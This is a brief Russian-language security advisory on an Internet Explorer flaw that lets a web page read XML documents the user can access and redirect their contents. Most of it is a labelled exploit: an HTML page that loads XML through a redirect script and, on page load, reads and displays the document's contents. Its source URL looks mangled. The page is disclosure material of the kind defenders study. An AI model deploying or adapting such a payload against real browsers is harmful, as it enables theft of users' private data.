Программа: Microsoft Internet Explorer
Удаленный атакующий может просмотреть любые XML документы на системе, доступ к которым имеет пользователь.
Удаленный атакующий может с помощью специального HTML кода получить данные из XML документов и перенаправить их себе.
Эксплоит:
<html>
<script>
function f()
{
alert(document.all.x1.XMLDocument.xml);
}
</script>
<body onload="f()">
<script id="x1" language="xml" src="https://xakep.ru/wp-content/uploads/post/24216//cgi-bin/redir.pl"></script>
<h1>
Copyright Georgi Guninski <br />
Cannot be used in any database
</h1>
</body>
< /html>
